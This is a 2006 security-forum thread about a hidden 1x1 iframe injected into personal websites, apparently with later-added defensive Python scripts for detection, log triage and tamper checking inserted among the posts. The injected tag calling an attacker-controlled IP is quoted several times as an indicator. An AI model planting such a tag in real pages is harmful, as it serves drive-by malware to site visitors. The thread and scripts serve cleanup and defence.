CastleCops, Internet Crime Fighters

Downloader Virus
tatlyn

Cadet
Joined: Jun 27, 2006
Posts: 3
Location: Canada

PostPosted: Tue Jun 27, 2006 10:02 pm    Post subject: Downloader Virus

When I go to the index page of my own web site, Norton Anti-Virus pops up with the alert that a virus has been detected on my computer; the virus name is *downloader* and it is located in:

c:\windows\tempo...\index[1].htm

it further says that access to the file has been denied.

I've searched for the file and it doesn't exist. My web site's index page is index.html.

This alert only comes up when I go to the index page of my web site. I can go to other web sites no problem.

I've done a virus scan but Norton doesn't find the virus through a scan, only when I go to my page.

Can anyone advise what I should do to get rid of this virus? Are people visiting my web site being infected with the virus?

Any help that can be provided would be so greatly appreciated.

Lynda

ecd

Lieutenant
Joined: May 18, 2006
Posts: 154


PostPosted: Tue Jun 27, 2006 10:05 pm    Post subject:

Can we try your index page to see if we get it, too?

You might have to empty your temporary internet files from the browser.
Know how to do that?

It is not impossible for a hacker to get into your code on a website. You might want to go in and change your password now. Can you open your site in FTP or the authoring program you use and check your code for alteration?

tatlyn

Cadet
Joined: Jun 27, 2006
Posts: 3
Location: Canada

PostPosted: Tue Jun 27, 2006 11:54 pm    Post subject:

thanks so much for your reply.

I've already deleted cookies, history and all temp internet files. I'll go now and see if I can spot something in my code that has changed or been added.

Edited to delete my web address. I'm nervous now that it will be tampered with again. I've had the site for several years and never had any problem like this.



Last edited by tatlyn on Wed Jun 28, 2006 12:09 am, edited 1 time in total
Bad_Frogger

Captain
Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:07 am    Post subject:

Hi tatlyn,

Your page is definitely corrupted.
It's like an ActiveX drive by download.

I advise people not to go to your link above unless they
have a high level of protection/savvy.

At least you know it's the page and not your PC.
I and I'm sure others will try to figure out what it is.

Bad out.


_________________
MS's "New Coke"
tatlyn

Cadet
Joined: Jun 27, 2006
Posts: 3
Location: Canada

PostPosted: Wed Jun 28, 2006 12:07 am    Post subject:

yep, this code,

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

had been added to the very top of my source code. I uploaded my index page (to replace the one that was there) and I'm no longer getting the virus alert.

Does this mean that I was hacked? I'm guessing the added code redirected to a malicious page? Any insight would be very much appreciated.

Lynda

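Added example, not code from the thread: a small scanner for the kind of tag tatlyn found, a 1x1 (or otherwise hidden) iframe whose src points at a host other than your own. It parses the HTML with Python's standard html.parser and flags only iframes that are both hidden and off-site, so an ordinary embedded player on your own site is not reported. The sample page, the site hostname www.example.com and the thresholds are constructed for illustration; point scan_file at the files you download from the server (or at your local copies before uploading).

```python
"""Flag hidden, off-site iframes in HTML, the pattern injected in this thread."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed hostname of the site being checked; anything else is "off-site".
SITE_HOST = "www.example.com"

# Constructed sample: the injected tag as posted in the thread, prepended to an
# otherwise ordinary page that also embeds a legitimate, visible local iframe.
SAMPLE_PAGE = """<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<html><head><title>My site</title></head>
<body><p>Welcome.</p>
<iframe src="/video.html" width="640" height="480"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # html.parser already lowercases attribute names; values may be None
            self.iframes.append({name: (value or "") for name, value in attrs})


def _dimension(value):
    """Parse a width/height such as '1' or '1px'; None if not numeric."""
    digits = value.strip().lower().rstrip("px").strip()
    return int(digits) if digits.isdigit() else None


def is_hidden(attrs):
    """Tiny (<= 2px on either axis) or CSS-hidden frames count as hidden."""
    width = _dimension(attrs.get("width", ""))
    height = _dimension(attrs.get("height", ""))
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = (width is not None and width <= 2) or (height is not None and height <= 2)
    return tiny or "display:none" in style or "visibility:hidden" in style


def is_offsite(attrs, site_host):
    """True when src has a host component that is not our own site."""
    netloc = urlparse(attrs.get("src", "").strip()).netloc
    return bool(netloc) and netloc.lower() != site_host.lower()


def find_suspicious_iframes(html, site_host=SITE_HOST):
    """Return the src of every iframe that is both hidden and off-site."""
    collector = IframeCollector()
    collector.feed(html)
    return [f["src"].strip() for f in collector.iframes
            if is_hidden(f) and is_offsite(f, site_host)]


def scan_file(path, site_host=SITE_HOST):
    """Scan one HTML file on disk; returns the list of suspicious src values."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return find_suspicious_iframes(fh.read(), site_host)


if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_PAGE):
        print("hidden off-site iframe ->", src)
```

Run it against every .html file you pull back from the host, not just index.html; in this thread the tag was prepended to the top of the page, but the check does not depend on position.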
Bad_Frogger

Captain
Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:17 am    Post subject:

This is what I get from XPL.

MDAC ActiveX code execution (CVE-2006-0003)

Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. Addressed in Microsoft Security bulletin MS06-014.

Bad out.


_________________
MS's "New Coke"
Bad_Frogger

Captain
Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:20 am    Post subject:

I can't explain how the code got there or what it does.
Most all the info available is about protecting yourself,
windows patches yadda yadda yadda.

Microsoft Security Bulletin here-
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

Bad out.


_________________
MS's "New Coke"
Bad_Frogger

Captain
Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Wed Jun 28, 2006 12:29 am    Post subject:

The IP address that was injected on your page goes back to
Russian Business Network, I would say yes your site was hacked.
Probably someone trying to build a Botnet, as the vulnerability
they are trying to exploit deals with remote control of PC's.

Bad out.


_________________
MS's "New Coke"
ecd

Lieutenant
Joined: May 18, 2006
Posts: 154


PostPosted: Wed Jun 28, 2006 4:52 am    Post subject:

Yes, SocketShield reports that exploit to me, too.

They were capturing your visitors into a frames page on their server
where the malicious code was residing.

You really need to change the password on your login to the server, and make it HARD to crack, no puppy names or favorite candy-bars. Like
random numbers and letters upper and lower case. And report it to your hosting provider, they have access logs.

I had a site I take care of hacked into couple weeks ago. They put a link to their disgusting site in a footer that showed up on all her pages. I changed the password immediately.

Whatsthis4

Cadet
Joined: Jun 30, 2006
Posts: 3
Location: USA

PostPosted: Fri Jun 30, 2006 5:08 am    Post subject:

Hi,

I searched the 81.95.146.98 address to see if I could find anyone that has had this same problem and to my good fortune it brought me here.

I have been attacked twice now in about 2 months. Both times it left my index.html inaccessible. I'm thinking because the code was inserted before the html tag, it causes an error and stops reading the rest of the source. That same line of code was inserted first thing on my index page both times.

Is your host Ipowerweb by chance? The reason I am asking is I am trying to determine if it might be a server wide thing or a personalized attack. I have contacted my host (Ipowerweb) about this and they just gave the standard "change your password or maybe remove the FrontPage extensions from your site" answer with no further discussion. Some things that happened during our discussion made me think they knew all about the problem.

My site is all about adware/spyware/virus dangers and I offer repair and clean up services. My target group is local as are most of my visitors. I use print advertising to get the word out. My site pretty much isn't indexed by the search engines and if I do a search for my business name very little if anything comes up in the results. For that reason I find the chances pretty slim that this was a personal attack from someone in Taiwan.

I have done a lot of research trying to figure out what happened. I also came up with the same Russian info on the ip. I did some looking into my access logs for my site and also came up with this:

218.210.11.180 - - [24/Jun/2006:04:59:38 -0700] "GET / HTTP/1.1" 200 622 "file:///E:/00search/SPdealer/SP_dealer2.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322; InfoPath.1)"

I checked the IP and it is from a place called New Century InfoComm Tech. Co., Ltd. out of Taipei, Taiwan. I am assuming that the referrer line coming from a file on the E drive of someone's computer isn't normal.

Do you have access to your logs? If you do, maybe you might find the same line also. If you have the ability to ban IPs from your site this might be one to put in there.

When the first attack happened I checked the source on the Index.html at 81.95.146.98 and found code that seemed to be trying to load a file called Win.exe. I make my living cleaning garbage off of people's computers and I seem to remember that file. I don't think I would have to search these forums too far to find something on it.

Do you have FrontPage extensions installed on your site? If you don't, at least I can rule that out as the possible entry point.

My current theory has someone using that file to get in through a hole of some sort. Maybe even through the FrontPage extensions.

Not really asking a question, just relaying information from my experience with this problem. Ultimately solved my issue by removing the code but it didn't stop it from happening again.

Jim

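Added example, not code from the thread: the log triage Jim describes, done over an Apache combined-format access log. It parses each line, pulls out the entries whose referrer is a file:/// URL (a browser normally sends an http:// referrer or none at all, so a local-file referrer is worth a look), counts hits per source address, and prints an .htaccess block that denies the addresses you decide to ban. The first sample line is the entry quoted in the post; the other lines and the IP 192.0.2.10 are constructed for illustration, and the .htaccess syntax assumes Apache 2.2-style mod_authz_host (Apache 2.4 uses Require instead).

```python
"""Triage an Apache combined-format access log for local-file referrers."""
import re
from collections import Counter

# One regex for the combined log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log. Line 1 is the entry quoted in the post above; the
# rest are made up, including one malformed line the parser must skip.
SAMPLE_LOG = """218.210.11.180 - - [24/Jun/2006:04:59:38 -0700] "GET / HTTP/1.1" 200 622 "file:///E:/00search/SPdealer/SP_dealer2.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322; InfoPath.1)"
192.0.2.10 - - [24/Jun/2006:05:01:02 -0700] "GET /index.html HTTP/1.1" 200 622 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
218.210.11.180 - - [24/Jun/2006:05:03:11 -0700] "GET /index.html HTTP/1.1" 200 622 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; .NET CLR 1.1.4322; InfoPath.1)"
this line is not a valid log entry
"""


def parse_log(text):
    """Return one dict per well-formed line; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            entries.append(match.groupdict())
    return entries


def local_file_referers(entries):
    """Entries whose referrer is a file: URL, i.e. a page opened from someone's own disk."""
    return [e for e in entries if e["referer"].lower().startswith("file:")]


def hits_per_ip(entries):
    """How many requests each source address made."""
    return Counter(e["ip"] for e in entries)


def htaccess_deny(ips):
    """Apache 2.2-style block denying the given addresses (assumed host config)."""
    lines = ["Order Allow,Deny", "Allow from all"]
    lines += ["Deny from %s" % ip for ip in sorted(set(ips))]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    flagged = local_file_referers(entries)
    for e in flagged:
        print("%s %s %s referer=%s" % (e["ip"], e["time"], e["request"], e["referer"]))
    print(hits_per_ip(entries))
    print(htaccess_deny(e["ip"] for e in flagged))
```

A file:/// referrer on its own proves nothing about how the page was modified; it tells you the request came from a page someone opened locally, which is unusual enough to be worth correlating with the upload timestamps your host can see in its FTP logs.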
deb

Guest
IP: 195.93.*.*
PostPosted: Fri Jul 07, 2006 11:59 am    Post subject: downloader virus

Hi, just read through these posts and I also have the downloader virus on my PC.
If I run a Norton scan it doesn't detect anything, but as soon as I go onto my own website then the virus alert pops up.
I don't understand computer jargon very well and I haven't a clue how to get rid of this. I have deleted cookies, temp files etc. to no avail. If I go into Norton to see where the infected file is, it says it's in temp internet files but I can't find anything.
Please could someone help me, I'm pulling my hair out!!

Bad_Frogger

Captain
Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Sat Jul 08, 2006 12:35 am    Post subject:

Hi deb,

I think the Norton pop ups are probably telling you it is stopping the infection from your site.

Did you create the site using HTML on your machine or use some
online website builder so you've never even seen the HTML code?

To remove the problem from your webpage you will need to edit the HTML like tatlyn did in the post above.

The line of code you need to remove should look like this
<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

In order to be more specific I would need to have a link to your page so I could view the source code.
But you would have to be the one to use a password
and actually change the code.

Make sense?

If you don't want to make your page public on the forum you could PM your page URL to me.
But I think you will have to register here and sign in to use PM. It's free.

Bad out.


_________________
MS's "New Coke"
leek

Cadet
Joined: Jul 07, 2006
Posts: 4
Location: USA

PostPosted: Sat Jul 08, 2006 1:11 am    Post subject:

Hello,

It is not limited to one provider or site. It appears to be a new bot which started around ten days ago and is slowly making rounds. See:

http://www.dmgenie.com/smf/index.php?PHPSESSID=29b8967c8a692a61d18ee1aa8e9f2621&topic=3601.new

It has affected my friend's site too (not the above -- another site), and he uses Apache on Linux.

Apparently entry occurs through user's PC, before they upload their data to their hosting provider or server. It does not compromise the server. The virus infects HTML files on a person's PC before they send them to the server, and it puts a malformed iframe tag at the top of the page, an iframe which references a Russian site:

Code:

inetnum:        81.95.144.0 - 81.95.147.255
netname:        RBNET
descr:          Russian Business Network
admin-c:        RBNR-ORG
tech-c:         RBNR-ORG
mnt-by:         RBN-MNT
status:         ASSIGNED PA
country:        RU
remarks:        INFRA-AW
source:         RIPE # Filtered

role:           Russian Business Network Registry
address:        Russian Business Network
address:        12 Levashovskiy pr.
address:        197110 Saint-Petersburg
address:        Russia
remarks:        Points of contact for RBN Network Operations
remarks:        ------------------------------------------------------
remarks:        Routing and peering issues:         ncc@rbnnetwork.com
remarks:        SPAM and Network security issues: abuse@rbnnetwork.com
remarks:        Customer support:               support@rbnnetwork.com
remarks:        General information:               info@rbnnetwork.com
remarks:        ------------------------------------------------------
admin-c:        ON316-RIPE
admin-c:        NI212-RIPE
tech-c:         MZ2231-RIPE
tech-c:         NI212-RIPE
nic-hdl:        RBNR-ORG
mnt-by:         RBN-MNT
source:         RIPE # Filtered
abuse-mailbox:  abuse@rbnnetwork.com

% Information related to '81.95.144.0/20AS40989'

route:          81.95.144.0/20
descr:          TcS Network
origin:         AS40989
mnt-by:         RBN-MNT
source:         RIPE # Filtered


Mozilla / Firefox users are not affected, since those browsers ignore the bad iframe, and even if they didn't, it wouldn't cause harm. IE users are vulnerable. I don't yet know the mechanics of how it installs itself by going to the Russian site.

My advice: Don't use IE -- use Firefox, Opera, anything but IE. And use Privoxy ( http://www.privoxy.org/ ).

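Added example, not code from the thread: whether the tag is written by something on the author's PC before upload (leek's reading) or by someone with the FTP password (ecd's), the practical defence is the same: keep a baseline of file hashes and diff against it, both for the local copy before you upload and for what you download back from the server. The code below builds a SHA-256 manifest of a site tree and reports added, removed and modified files. The demo function creates a throwaway site in a temporary directory, takes a baseline, prepends the iframe from this thread to index.html and shows it surfacing as a modified file; the directory layout and file contents are constructed for the demonstration.

```python
"""SHA-256 manifest of a site tree, and a diff against a saved baseline."""
import hashlib
import json
import os
import tempfile

WEB_EXTENSIONS = (".html", ".htm", ".js", ".php", ".css")


def sha256_file(path):
    """Hash a file in 64 KiB chunks so large files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root, extensions=WEB_EXTENSIONS):
    """Map relative path -> sha256 for every web file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
    return manifest


def save_manifest(manifest, path):
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def compare_manifests(baseline, current):
    """Report paths that appeared, disappeared, or changed hash since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline a clean site, inject the iframe, diff."""
    with tempfile.TemporaryDirectory() as root:
        index = os.path.join(root, "index.html")
        os.makedirs(os.path.join(root, "about"))
        with open(index, "w") as fh:
            fh.write("<html><body>Welcome</body></html>\n")
        with open(os.path.join(root, "about", "about.html"), "w") as fh:
            fh.write("<html><body>About</body></html>\n")
        with open(os.path.join(root, "logo.png"), "wb") as fh:
            fh.write(b"\x89PNG not a real image")  # non-web file, ignored

        baseline_path = os.path.join(root, "manifest.json")
        save_manifest(build_manifest(root), baseline_path)

        # Simulate the tampering seen in this thread: tag prepended to index.html.
        with open(index) as fh:
            original = fh.read()
        with open(index, "w") as fh:
            fh.write('<iframe src="http://81.95.146.98/index.html" width="1" height="1"></iframe>\n')
            fh.write(original)

        return compare_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    print(demo())
```

Keep the baseline manifest somewhere other than the web root and the machine you edit on, otherwise whatever altered the pages can alter the manifest too; a copy on a USB stick or in an e-mail to yourself is enough for a small site.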
Bad_Frogger


Joined: May 12, 2006
Posts: 507
Location: Canada

PostPosted: Sat Jul 08, 2006 1:51 am    Post subject:

Further up in this thread I found the vulnerability that is exploited
when you get to the russian site and the page loads.

MS security bulletin.
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
It's more ActiveX crap. Thanks MS.

I am immune: Firefox, NoScript, XPL.

Thanks for the info.


_________________
MS's "New Coke"
leek

Cadet
Joined: Jul 07, 2006
Posts: 4
Location: USA

PostPosted: Sun Jul 09, 2006 5:42 pm    Post subject:

The same Russian netblock is mentioned here:

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.eterok.c.html?Open

All times are GMT
Page 1 of 2